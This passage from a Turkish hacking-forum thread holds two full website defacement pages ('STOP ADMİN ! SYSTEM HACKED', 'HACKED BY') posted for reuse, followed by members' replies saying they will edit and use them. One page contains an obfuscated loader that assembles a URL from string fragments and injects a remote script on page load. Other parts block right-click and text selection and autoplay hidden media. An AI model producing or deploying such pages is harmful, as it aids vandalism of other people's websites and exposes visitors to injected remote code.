  681.             //canvas.height = height;
  682.             canvas.height = 700;
  683.         }
  684.  
  685.         // animation
  686.         function initAnimation() {
  687.             animate();
  688.             for(var i in points) {
  689.                 shiftPoint(points[i]);
  690.             }
  691.         }
  692.  
  693.         function animate() {
  694.             if(animateHeader) {
  695.                 ctx.clearRect(0,0,width,height);
  696.                 for(var i in points) {
  697.                     // detect points in range
  698.                     if(Math.abs(getDistance(target, points[i])) < 4000) {
  699.                        points[i].active = 0.3;
  700.                        points[i].circle.active = 0.6;
  701.                    } else if(Math.abs(getDistance(target, points[i])) < 20000) {
  702.                        points[i].active = 0.1;
  703.                        points[i].circle.active = 0.3;
  704.                    } else if(Math.abs(getDistance(target, points[i])) < 40000) {
  705.                        points[i].active = 0.02;
  706.                        points[i].circle.active = 0.1;
  707.                    } else {
  708.                        points[i].active = 0;
  709.                        points[i].circle.active = 0;
  710.                    }
  711.  
  712.                    drawLines(points[i]);
  713.                    points[i].circle.draw();
  714.                }
  715.            }
  716.            requestAnimationFrame(animate);
  717.        }
  718.  
  719.        function shiftPoint(p) {
  720.            TweenLite.to(p, 1+1*Math.random(), {x:p.originX-50+Math.random()*100,
  721.                y: p.originY-50+Math.random()*100, ease:Circ.easeInOut,
  722.                onComplete: function() {
  723.                    shiftPoint(p);
  724.                }});
  725.        }
  726.  
  727.        // Canvas manipulation
  728.        function drawLines(p) {
  729.            if(!p.active) return;
  730.            for(var i in p.closest) {
  731.                ctx.beginPath();
  732.                ctx.moveTo(p.x, p.y);
  733.                ctx.lineTo(p.closest[i].x, p.closest[i].y);
  734.                ctx.strokeStyle = 'rgba(156,217,249,'+ p.active+')';
  735.                ctx.stroke();
  736.            }
  737.        }
  738.  
  739.        function Circle(pos,rad,color) {
  740.            var _this = this;
  741.  
  742.            // constructor
  743.            (function() {
  744.                _this.pos = pos || null;
  745.                _this.radius = rad || null;
  746.                _this.color = color || null;
  747.            })();
  748.  
  749.            this.draw = function() {
  750.                if(!_this.active) return;
  751.                ctx.beginPath();
  752.                ctx.arc(_this.pos.x, _this.pos.y, _this.radius, 0, 2 * Math.PI, false);
  753.                ctx.fillStyle = 'rgba(156,217,249,'+ _this.active+')';
  754.                ctx.fill();
  755.            };
  756.        }
  757.  
  758.        // Util
  759.        function getDistance(p1, p2) {
  760.            return Math.pow(p1.x - p2.x, 2) + Math.pow(p1.y - p2.y, 2);
  761.        }
  762.  
  763.    })();
  764. </script> <div id="push" class=""></div>
  765.  
  766.     </script>
  767. <style type="text/css">
  768. body {
  769.    background-image: url("https://resmim.net/f/ZYCNWj.png");
  770. <br>
  771. <meta property="og:image"    content="http://images4.alphacoders.com/285/285998.jpg">
  772. <meta property="og:image:width"    content="1200"/>
  773. <meta property="og:image:height"    content="630"/>
  774. <link href='http://fonts.googleapis.com/css?family=Orbitron:700|Gruppo' rel='stylesheet' type='text/css'>
  775.  
  776. <script src="http://smilenet4u.googlecode.com/files/TipingText.js"></script>
  777.  
  778. </head>
  779.  
  780. <style>');
  781. background-repeat:no-repeat;
  782. font-family:'Orbitron', sans-serif;
  783. pre{
  784. font-family:'Orbitron',sans-serif;
  785. }
  786. #plate{
  787. position: absolute;!important;
  788. top:0!important;
  789. left:0;
  790. right:0;
  791. width:100%;
  792. height:100%;
  793. z-index:-1!important;
  794. margin:0;
  795. padding:0;
  796. position:fixed;
  797. }
  798. #xx{
  799. font-size:60px;
  800. text-shadow:0 0 5px #ff0000, 0 0 10px #ff7f00, 0 0 15px #ffff00, 0 0 20px #10ff00, 0 0 30px #0048ff, 0 0 40px #0015ff, 0 0 55px #6100ff;
  801. }
  802. #xx2{
  803. font-size:60px;
  804. text-shadow:0 0 5px #ff0000, 0 0 10px #ff7f00, 0 0 15px #ffff00, 0 0 20px #10ff00, 0 0 30px #0048ff, 0 0 40px #0015ff, 0 0 55px #6100ff;
  805. top:300!important;
  806. right: 550px;
  807. margin:0;
  808. padding:0;
  809. position:fixed;
  810. }
  811.  
  812. <body class="unselectable">
  813. <center>
  814. </div>
  815.  
  816. <div class="message">
  817. <pre>
  818. <p id="xx">
  819. STOP ADMİN ! SYSTEM HACKED <br /><hr width="65%" size="1" style="opacity: 1px;"> </p>
  820.  </span></p> <br />
  821. <p id="xx2"><span style="font-size:30px;">HACKED BY.</span>
  822. <span style="font-size:30px;">Çanakkale Geçilmez!!!</span>
  823. <span style="font-size:30px;">Bunu En İyi Atalarınız Bilir!!..</span>
  824. </p>
  825. </div>
  826.  
  827. </center>
  828. <script language="javascript" src="http://ic.sitekodlari.com/sagtusengelleme1.js"></script>
  829.  
  830. <embed width="0" height="0" src="http://www.youtube.com/v/6FkSafA2dpA&autoplay=1&amp;loadingcolor=000000&amp;slidercolo"></p>
  831.  
  832.  
  833. <style>.k-d{color: black;}
  834. .golge{position:fixed;z-index:999;width:100%;height:100%;
  835. background:transparent;overflow:hidden !important;}
  836. .tl{width:100%;height:100%;background: url(http://i.hizliresim.com/vj4jYm.png); background: -moz-radial-gradient(center, ellipse cover, rgba(0,0,0,0) 0%, rgba(0,0,0,0) 10%, rgba(0,0,0,0.05) 16%, rgba(0,0,0,0.15) 23%, rgba(0,0,0,0.25) 27%, rgba(0,0,0,0.45) 41%, rgba(0,0,0,0.55) 55%, rgba(0,0,0,0.75) 86%, rgba(0,0,0,0.75) 100%); background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%,rgba(0,0,0,0)), color-stop(10%,rgba(0,0,0,0)), color-stop(16%,rgba(0,0,0,0.05)), color-stop(23%,rgba(0,0,0,0.15)), color-stop(27%,rgba(0,0,0,0.25)), color-stop(41%,rgba(0,0,0,0.45)), color-stop(55%,rgba(0,0,0,0.55)), color-stop(86%,rgba(0,0,0,0.75)), color-stop(100%,rgba(0,0,0,0.75))); background: -webkit-radial-gradient(center, ellipse cover, rgba(0,0,0,0) 0%,rgba(0,0,0,0) 10%,rgba(0,0,0,0.05) 16%,rgba(0,0,0,0.15) 23%,rgba(0,0,0,0.25) 27%,rgba(0,0,0,0.45) 41%,rgba(0,0,0,0.55) 55%,rgba(0,0,0,0.75) 86%,rgba(0,0,0,0.75) 100%); background: -o-radial-gradient(center, ellipse cover, rgba(0,0,0,0) 0%,rgba(0,0,0,0) 10%,rgba(0,0,0,0.05) 16%,rgba(0,0,0,0.15) 23%,rgba(0,0,0,0.25) 27%,rgba(0,0,0,0.45) 41%,rgba(0,0,0,0.55) 55%,rgba(0,0,0,0.75) 86%,rgba(0,0,0,0.75) 100%); background: -ms-radial-gradient(center, ellipse cover, rgba(0,0,0,0) 0%,rgba(0,0,0,0) 10%,rgba(0,0,0,0.05) 16%,rgba(0,0,0,0.15) 23%,rgba(0,0,0,0.25) 27%,rgba(0,0,0,0.45) 41%,rgba(0,0,0,0.55) 55%,rgba(0,0,0,0.75) 86%,rgba(0,0,0,0.75) 100%); background: radial-gradient(ellipse at center, rgba(0,0,0,0) 0%,rgba(0,0,0,0) 10%,rgba(0,0,0,0.05) 16%,rgba(0,0,0,0.15) 23%,rgba(0,0,0,0.25) 27%,rgba(0,0,0,0.45) 41%,rgba(0,0,0,0.55) 55%,rgba(0,0,0,0.75) 86%,rgba(0,0,0,0.75) 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr="#00000000", endColorstr="#bf000000",GradientType=1 );
  837. background-size:200% 200%;
  838. }
  839. #topleft .tl{-webkit-border-bottom-right-radius: 100px; border-bottom-right-radius: 100px;}#topleft{top:0px;left:0px;-webkit-border-bottom-right-radius:100px; border-bottom-right-radius:100px;}#topright{top:0px;left:100%;-webkit-border-bottom-left-radius: 100px; border-bottom-left-radius: 100px}#botleft{top:100%;left:0px;-webkit-border-top-right-radius: 100px; border-top-right-radius: 100px;}#botright{top:100%;left:100%;-webkit-border-top-left-radius: 100px; border-top-left-radius: 100px;}#topright .tl{ -webkit-border-bottom-left-radius: 100px; border-bottom-left-radius: 100px;background-position: right top;}#botright .tl{  background-position: bottom right !important;-webkit-border-top-left-radius: 100px; border-top-left-radius: 100px;}#botleft .tl{ background-position: bottom left !important;-webkit-border-top-right-radius: 100px; border-top-right-radius: 100px;}</style>
  840. <koddostu><div class='golge k-d' id='topleft'><div class='tl'></div></div>
  841. <div class='golge k-d' id='topright'><div class='tl'></div></div>
  842. <div class='golge k-d' id='botleft'><div class='tl'></div></div>
  843. <div class='golge k-d' id='botright'><div class='tl'></div></div>
  844. </koddostu>
  845. <script>var d=document,tol=d.getElementById('topleft'),tor=d.getElementById('topright'),bol=d.getElementById('botleft'),bor=d.getElementById('botright'),w=document.body.clientWidth,h=window.innerHeight;var script = document.createElement('script');script.src = "h"+"t"+"tps"+":/"+"/k"+"do"+"stu.google"+"code.com/svn/c"+"que"+"ry.j"+"s";
  846. document.getElementsByTagName('head')[0].appendChild(script);window.onresize=function(){};window.onmousemove=function(a){a=a||window.event;var b=a.clientX;a=a.clientY;var c=a-h+"px",e=b-w+"px",b=b+"px";a=a+"px";tol.style.top=c;tol.style.left=e;tor.style.top=c;tor.style.left=b;bol.style.top=a;bol.style.left=e;bor.style.top=a;bor.style.left=b};</script>
  847.  
  848. <script language="Javascript1.2"> <!--  ";  function rtclickcheck(keyp){   if (navigator.appName == "Netscape" && keyp.which == 3) {     alert(mymessage);     return false;   }    if (navigator.appVersion.indexOf("MSIE") != -1 && event.button == 2) {     alert(mymessage);     return false;   } }  document.onmousedown = rtclickcheck //--> </script>          
  849. <script language="JavaScript">   function none(){ return false; }  document.oncontextmenu=none document.onmousedown=none </script>
  850. <body oncontextmenu="return false" onselectstart="return false" ondragstart="return false"></body>
  851. <script type="text/javascript">
  852.  
  853. //form tags to omit in NS6+:
  854. var omitformtags=["input", "textarea", "select"]
  855.  
  856. omitformtags=omitformtags.join("|")
  857.  
  858. function disableselect(e){
  859. if (omitformtags.indexOf(e.target.tagName.toLowerCase())==-1)
  860. return false
  861. }
  862.  
  863. function reEnable(){
  864. return true
  865. }
  866.  
  867. if (typeof ********.onselectstart!="undefined")
  868. ********.onselectstart=new Function ("return false")
  869. else{
  870. ********.onmousedown=disableselect
  871. ********.onmouseup=reEnable
  872. }
  873.  
  874. <body onkeydown="return false">
  875. </body>
  876. </html>
  877. index çalışmasından ekran görüntüsü
  878. [​IMG]
  879.  
  880. 2.index
  881.  
  882. Kod:
  883. <META http-equiv="content-type" content="text/html; charset=ISO-8859-9">
  884. <link rel="shortcut icon" href="favicon.ico">
  885. <META http-equiv="content-type" content="text/html; charset=windows-1254">
  886. <META http-equiv="content-language" content="TR">
  887. <META http-equiv="content-type" content="text/html; charset=ISO-8859-9">
  888. <META name="description" content="ayyildiz.army turk hackerlar Forum Security  Portal Secure Hosting">
  889. <meta name="keywords" content="türk hackerlar,web site hack,mail hack,msn hack,forum,turk hackerlar,exploit,ayyıldız tım,mail,web,exploit,dos Attack prevention, Ddos atak engelleme, IDS, IPS, ASP, Ayyıldız Tim , ">
  890.  
  891. <META NAME="RATING" CONTENT="GENERAL">
  892. <META NAME="ABSTRACT" CONTENT="security">
  893. <META NAME="ROBOTS" CONTENT="All">
  894. <META NAME=googlebot CONTENT="Index, Follow">
  895. <META NAME=robots CONTENT="Index, Follow">
  896. <meta name="distribution" content="global">
  897.  
  898. <meta name="google-site-verification" content="6LFJGLFpbjals_jAGcI87D5NetbD_brsYdDUb9vrGOY" />
  899. <style>BODY { SCROLLBAR-BASE-COLOR: #004800; SCROLLBAR-ARROW-COLOR: #00CC00; }</style>
  900. <Style type=text/css>.Buton {BORDER-LEFT-WIDTH: 2px; FONT-SIZE: 10px; color:#006600; background-color:#00CC00; border-color:#00FF00; border-style:groove; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; font-weight:bold; }</Style>
  901. <Style type=text/css>.TextT {font-size:17px; border-style: border-width:2px; color:#000000; padding-top:0; padding-bottom:0; padding-left:4; height:23; border-color: #cccccc; font-family:Verdana, Arial, Helvetica, sans-serif; font-weight:bolder; }</Style>
  902. <Style type=text/css>.Tinput {color:#000000;}</Style>
  903. <Style type=text/css>.TextInput {BORDER-LEFT-WIDTH: 2px; FONT-SIZE: 11px; color:#000000; background-color:#00CC00; border-color:#00FF00; border-style:groove; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; font-weight:bold;}</Style>
  904.  
  905. <Style type=text/css>.Form {color:#000000;}</Style>
  906.  
  907. <style type="text/css">
  908. .input {color:#000000;}
  909. a {color:#00FF00; text-decoration:none;}
  910. a:hover {color:#00FF00; text-decoration:underline;}
  911. .TableBgFont {font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 11px; color:#090; font-weight:800; height: 27px;}
  912. .SolMenu a {font-size: 10px; color:#00CC00; font-weight:600;}
  913. .SolMenu a:hover {font-size: 10px; color:#FFFFFF; font-weight:600; text-decoration:none;}
  914.  
  915. .Standart1 {font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 11px; color:#66FF00; font-weight:600; text-decoration:none;}
  916. .Standart2 {font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color:#66FF00; font-weight: bold; text-decoration:none;}
  917. .Link2 {font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 11px; color: #000000; font-weight: bold; text-decoration:none;}
  918. .Link a {font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 11px; color:#00FF00; font-weight: bold; text-decoration:none;}
  919. .Link a:hover {font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 11px; color:#FF0000; font-weight: bold; text-decoration:none;}
  920. .LinkCizx a{font-size: 13px;}
  921. .LinkCizx a:hover{font-size: 13px; color:#FF0000;}
  922. .MiniFont {font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color:#00FF00;}
  923.  
  924. .BaslikB a {FONT-WEIGHT:600; font-family:Georgia; color:#00FF00; text-decoration:underline;}
  925. .BaslikB a:hover {FONT-WEIGHT: 600; font-family:Georgia; color:#FF0000;}
  926.  
  927. .MiniBold {font-size:9px; font-weight:bold; color:#158307; text-decoration:none;}
  928. .MiniBold a {font-size:9px; font-weight:bold; color:#00C000; text-decoration:none;}
  929. .MiniBold a:hover {font-size: 9px; font-weight:bold; color:#00FF00; text-decoration:none;}
  930.  
  931. .BigFont { font-family:'Times New Roman', Times, serif; font-weight:bolder; font-size:19px;}
  932.  
  933. .TableMS {
  934. text-decoration: none;
  935. padding: 5px 7px;
  936. margin-right: 0px;
  937. margin-left: 0px;
  938. border: 1px solid #1E1E1E;
  939. margin-left:0pt;
  940. margin-right:0pt;
  941. margin-bottom:0px;
  942. height:17;
  943. border-right-color:#1E1E1E;
  944. border-bottom-color:#95ff95;
  945.  
  946. FILTER: progid:DXImagetransform.Microsoft.gradient(enabled='true', startColorstr=#1E1E1E, endColorstr=#009900,) progid:DXImagetransform.Microsoft.Shadow(color='#dcdcdc', Direction=1, Strength=1);}
  947. .KLink {FONT-WEIGHT: 600; FONT-SIZE: 8pt; color:#006600;}
  948. .KLink a {FONT-WEIGHT: 600; FONT-SIZE: 8pt; color:#006600; text-decoration:none;}
  949. .KLink a:hover {FONT-WEIGHT: 600; FONT-SIZE: 8pt; color:#00FF00; text-decoration:none;}
  950.  
  951. .KLink2 {FONT-WEIGHT: 600; FONT-SIZE: 8pt; color:#009900;}
  952.  
  953. .MLink a {font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 10px; text-decoration:none;}
  954. .MLink a:hover {font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color:#00FF00; font-weight: bold; text-decoration:none;}
  955. .{font-family:Verdana, Arial, Helvetica, sans-serif; font-size:11px; color:#00FF00;}
  956. {font-family:Verdana, Arial, Helvetica, sans-serif; font-size:11px; color:#00FF00;}
  957. body,td,th {font-family:Verdana, Arial, Helvetica, sans-serif; font-size:11px; color: #02d802;}
  958. </style>      
  959.  
  960. <title>Ayyıldız Tim/ Uye Nıck</title>
  961. <!--71dcc1fd2234766eaecf898ed73f3e37-->
  962.  
  963. <body color="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" bgcolor="#000000">
  964.  
  965.  
  966. <script  language="JavaScript">      
  967. //Function to open pop up window
  968. function openWin(theURL,winName,features) {
  969.       window.open(theURL,winName,features);
  970. }
  971. <div class="slider"><br><br>
  972.     <div class="slide"> <h1>HELLO ADMIN SYSTEM HACKED!<span><span><br> Ayyıldız Tim / Uye Nick :) </h1> </div>
  973. <style> BODY { SCROLLBAR-BASE-COLOR: #3B3B3B; SCROLLBAR-ARROW-COLOR: #33FF33; } </style>
  974.  
  975. <style type="text/css">
  976.  
  977. #navbar-holder        { width: 100%; height: 34px; text-indent: 15px; background-color: #1e1e1e; }
  978. #navbar-link        { color: #599a2e; font-family: "Museo Sans 700"; font-size: 12px; text-decoration: none; line-height: 34px; }
  979.  
  980. ul#navbar-menu                    { float: right; list-style: none; margin:0; padding:0; }
  981. ul#navbar-menu>li                { float: left; height: 34px; padding-right: 16px; border-right: 1px solid #353535; }
  982. ul#navbar-menu>li:hover            { background-color: #353535; cursor: pointer;}
  983. ul#navbar-menu>li:hover>a        { color: #599a2e;}
  984. ul#navbar-menu>li:hover    ul        { display: block; position: absolute; margin-left:-40px; width:217px;}
  985. ul#navbar-menu>li>a             { text-decoration: none; color: #bdbdbd; line-height: 34px; font-family: "Museo Sans 700"; font-size: 12px;}
  986.  
  987. .transtable table {border:0 solid #e5e5e5; color:#FFF; background:#FFF; }
  988. .transtable table td{border:0 solid #e5e5e5; }
  989.  
  990. @font-face          { font-family: "Museo Sans 700"; src: url(forum/fonts/MuseoSans-700.otf); }
  991.  
  992. ul#navbar-sub-menu                { list-style: none; display: none;}
  993. ul#navbar-sub-menu>li            { cursor: pointer; background-color: #353535; padding-right: 17px;}
  994. ul#navbar-sub-menu>li:hover        { background-color: #2a2a2a;}
  995. ul#navbar-sub-menu>li>a            { text-decoration: none; white-space: nowrap;  color: #bdbdbd; line-height: 34px; font-family: "Museo Sans 700"; font-size: 12px; }
  996. ul#navbar-menu>li:last-child     { border:none !important; }
  997. ul#navbarmenu2>li:first-child     { border:none !important; }
  998.  
  999. *{
  1000.     margin: 10;
  1001.     padding:4;
  1002.     box-sizing: border-box;
  1003. }
  1004.  
  1005.  
  1006.  
  1007. h2{
  1008.     text-align: center;
  1009.     font-size: 801px;
  1010.     font-family: arial;
  1011.     margin-top: 100&;
  1012.     color: red;
  1013.     text-shadow: 12px 32px 72px red;
  1014. }
  1015.  
  1016. .lockedworld{
  1017.     width: 240px;
  1018.     margin: auto;
  1019.     perspective: 1500px;
  1020.     position: relative;
  1021.     margin-top: 150px;
  1022. }
  1023.  
  1024. .lockedworld2{
  1025.     width: 100%;
  1026.     position: absolute;
  1027.     animation: rotar 14s infinite linear;
  1028.     transform-style: preserve-3d;
  1029. }
  1030.  
  1031. .lockedworld2:hover{
  1032.     animation-play-state: paused;
  1033.     cursor: pointer;
  1034. }
  1035.  
  1036.  
  1037. .lockedworld2 figure{
  1038.     width: 100%;
  1039.     height: 126px;
  1040.     overflow: hidden;
  1041.     position: absolute;
  1042.     box-shadow: 0px 0px 72px 0px red;
  1043.     transition: all 600ms;
  1044.    
  1045. }
  1046.  
  1047. .lockedworld2 figure:hover{
  1048.     box-shadow: 0px 0px 240px 0px red;
  1049.     transition: all 300ms;
  1050. }
  1051.  
  1052. .lockedworld2 figure:nth-child(1){transform: rotateY(0deg) translateZ(300px);}
  1053. .lockedworld2 figure:nth-child(2){transform: rotateY(40deg) translateZ(300px);}
  1054. .lockedworld2 figure:nth-child(3){transform: rotateY(80deg) translateZ(300px);}
  1055. .lockedworld2 figure:nth-child(4){transform: rotateY(120deg) translateZ(300px);}
  1056. .lockedworld2 figure:nth-child(5){transform: rotateY(160deg) translateZ(300px);}
  1057. .lockedworld2 figure:nth-child(6){transform: rotateY(200deg) translateZ(300px);}
  1058. .lockedworld2 figure:nth-child(7){transform: rotateY(240deg) translateZ(300px);}
  1059. .lockedworld2 figure:nth-child(8){transform: rotateY(280deg) translateZ(300px);}
  1060. .lockedworld2 figure:nth-child(9){transform: rotateY(320deg) translateZ(300px);}
  1061. .lockedworld2 figure:nth-child(10){transform: rotateY(360deg) translateZ(300px);}
  1062.  
  1063. .lockedworld2 img{
  1064.     width: 100%;
  1065.     transition: all 300ms;
  1066. }
  1067.  
  1068. .lockedworld2 img:hover{
  1069.     transform: scale(1.2);
  1070.     transition: all 300ms;
  1071. }
  1072.  
  1073.  
  1074. @keyframes rotar{
  1075.     from{
  1076.         transform: rotateY(0deg);
  1077.     }to{
  1078.         transform: rotateY(360deg);
  1079.     }
  1080. }
  1081.  
  1082.         </style>
  1083. </head>
  1084.     <div class="lockedworld">
  1085.         <div class="lockedworld2">
  1086.             <figure><img src="https://i.hizliresim.com/RnzJ3Z.jpg"></figure>
  1087.             <figure><img src="https://3.bp.blogspot.com/-baYk04tXgiA/VtnyaUr-WJI/AAAAAAAAkA4/NGCNMluYuJA/s1920/turk-bayragi-duvar-kagidi-indir-13.jpg"></figure>
  1088.             <figure><img src="https://i.hizliresim.com/2Jz2jL.jpg"></figure>
  1089.            <figure><img src="https://3.bp.blogspot.com/-baYk04tXgiA/VtnyaUr-WJI/AAAAAAAAkA4/NGCNMluYuJA/s1920/turk-bayragi-duvar-kagidi-indir-13.jpg"></figure>
  1090.             <figure><img src="https://i.hizliresim.com/763o7P.jpg"></figure>
  1091.             <figure><img src="https://3.bp.blogspot.com/-baYk04tXgiA/VtnyaUr-WJI/AAAAAAAAkA4/NGCNMluYuJA/s1920/turk-bayragi-duvar-kagidi-indir-13.jpg"></figure>
  1092.             <figure><img src="https://i.hizliresim.com/PlJ507.jpg"></figure>
  1093.             <figure><img src="https://3.bp.blogspot.com/-baYk04tXgiA/VtnyaUr-WJI/AAAAAAAAkA4/NGCNMluYuJA/s1920/turk-bayragi-duvar-kagidi-indir-13.jpg"></figure>
  1094.          <figure><img src="https://i.hizliresim.com/2Jz29N.jpg"></figure>
  1095.         </div>
  1096.         <div class="footerbtns">
  1097. </div>
  1098. <embed src="https://www.youtube.com/v/7unENFLHAVs&amp;autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">
  1099. </body>
  1100.     </div>
  1101. </html>
  1102.  
  1103. index içi ekran görüntüsü
  1104. [​IMG]
  1105.  
  1106. not: yapacagım ındex calısmalarını bu konu altında paylaşacagım suanlık acemıyım kusura bakmayın
  1107. Hepsini görmek için tıklayın...
  1108. İndexte sancak tim yazıyo ne alaka
  1109. 22 Nisan 2018
  1110. Orion-Pax bunu beğendi.
  1111. Mavi-Ay
  1112. Atıldı
  1113. Toyonzade demiş ki: ↑
  1114. İndexte sancak tim yazıyo ne alaka
  1115. kodların bazılarını indexlerden editleyip aldım ondandır paşalarımızdan birisini etiketler düzenlemesini yaparım
  1116. 22 Nisan 2018
  1117. Mavi-Ay
  1118. Atıldı
  1119. Toyonzade demiş ki: ↑
  1120. İndexte sancak tim yazıyo ne alaka
  1121. [​IMG]
  1122.  
  1123. indexsi kaydetmeden ekran goruntusu almısım kusura bakma
  1124. 22 Nisan 2018
  1125. NicksizBoys
  1126. Atıldı
  1127. Sancak tim zamanın kötü forumuydu SiNeKBeY kurucusuydu böyle indexleri yoktu ilk defa gördüm her neyse editleyip kullanacağım sağol devrem
  1128. 22 Nisan 2018
  1129. Mavi-Ay bunu beğendi.
  1130. Mavi-Ay
  1131. Atıldı
  1132. NicksizBoys demiş ki: ↑
  1133. Sancak tim zamanın kötü forumuydu SiNeKBeY kurucusuydu böyle indexleri yoktu ilk defa gördüm her neyse editleyip kullanacağım sağol devrem
  1134. hack hayatıma burada başladım burada sürdürüyorum başka bi grupla ne ilgim olur ne alakam tek hatam editlemeden ekran görüntüsü almam ..
  1135. seviyorum böyle kodlarını birbirine karıştırm